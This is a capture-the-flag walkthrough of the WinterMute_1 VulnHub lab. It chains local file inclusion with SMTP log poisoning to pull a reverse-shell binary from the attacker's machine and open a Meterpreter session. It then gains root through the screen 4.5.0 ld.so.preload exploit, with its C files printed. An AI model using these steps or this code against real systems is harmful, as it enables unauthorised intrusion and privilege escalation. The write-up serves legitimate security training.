WinterMute_1 (VulnHub)

VM LINK: https://download.vulnhub.com/wintermute/Wintermute-v1.zip

root@kali:~# netdiscover -i eth0

root@kali:~# nmap -p- -A 192.168.1.124

Open ports: 25, 80, 3000

In the browser:

http://192.168.1.124

http://192.168.1.124:3000

username : admin
password : admin

and we are in.

On clicking the Flows option, we were redirected to the following page:

Here we observed that a few directories were listed (as shown in the screenshot above), so we tried appending them to the URL http://192.168.1.124/ or http://192.168.1.124:3000/.

We tried accessing http://192.168.1.124:3000/turing-bolo/ without success. Then we browsed to http://192.168.1.124/turing-bolo/ and got the page below:

http://192.168.1.124/turing-bolo/

Click on Submit Query and we are redirected to the following page:

http://192.168.1.124/turing-bolo/bolo.php?bolo=case

From the above screenshot we can see a few log files (as highlighted). In our experience, this could be an indication of directory traversal / local file inclusion, where writable files on the server can be included and executed through the browser. Hence let's try appending ../../../log/mail to the URL in the browser as follows:

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail

Now let's enumerate further and connect to the SMTP service on port 25.

root@kali:~# telnet 192.168.1.124 25

MAIL FROM:<rrajchandel@gmail.com>

RCPT TO: shell.elf

root@kali:~# python -m SimpleHTTPServer 80

Since we succeeded in getting the output of OS commands back through the mail log file, the same method may also give us Meterpreter access to the victim machine.

Hence, as seen in the screenshot below, we pass the commands through the RCPT TO command as follows:

1. Navigate to the /tmp directory and download the shell.elf file from the Kali machine

2. Modify the permissions of the shell.elf file

3. Execute our reverse shell (shell.elf)

RCPT TO:

RCPT TO:

RCPT TO:

Now, in parallel, open the Metasploit console and perform the following:

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/$ find / -perm -4000 2>/dev/null

Now, on another terminal:

root@kali:~# searchsploit screen 4.5.0

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/41154.sh

https://www.exploit-db.com/exploits/41154/

root@kali:~# gedit libhax.c

/*
 * Constructor library from the public screen 4.5.0 local privilege-
 * escalation PoC (exploit-db 41154, linked above).
 * NOTE(review): the three #include lines lost their header names during
 * page extraction, and the string literals use curly quotes (“ ”) instead
 * of ASCII " — this block will not compile as shown.
 * Detection note: a write to /etc/ld.so.preload and the appearance of a
 * new setuid-root file under /tmp are the high-signal indicators of this
 * technique.
 */
#include
#include
#include
/* Marked as a constructor, so it runs when the shared object is loaded
 * into a process (here via /etc/ld.so.preload), before that process's
 * main(). */
__attribute__ ((__constructor__))
void dropshell(void){
/* Make /tmp/rootshell owned by uid 0 / gid 0 and setuid-root (mode 04755). */
chown(“/tmp/rootshell”, 0, 0);
chmod(“/tmp/rootshell”, 04755);
/* Remove the preload entry so the library stops loading into every
 * subsequent process. */
unlink(“/etc/ld.so.preload”);
printf(“[+] done!\n”);
}

root@kali:~# gedit rootshell.c

/*
 * Companion binary to libhax.c: once the preload library has made this
 * file setuid-root, running it switches the real and effective uid/gid
 * to 0 and replaces the process with /bin/sh.
 * NOTE(review): the #include lost its header name during page extraction
 * and the string literal uses curly quotes — this block will not compile
 * as shown.
 */
#include
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp(“/bin/sh”, NULL, NULL);
}

Now go back to the Meterpreter session and upload the exploit files from the Kali machine, via the Meterpreter session, to the /tmp directory of the target (victim) machine.

meterpreter > upload libhax.c /tmp

meterpreter > upload rootshell.c /tmp

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/$ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

www-data@straylight:/$ gcc -o /tmp/rootshell /tmp/rootshell.c

www-data@straylight:/$ cd /etc
www-data@straylight:/$ unmask 000
www-data@straylight:/$ screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
www-data@straylight:/$ screen -ls

www-data@straylight:/$ /tmp/rootshell

# cd /root

Let's see what files it contains:

# ls

# cat flag.txt

# cat note.txt

@SAKSHAM DIXIT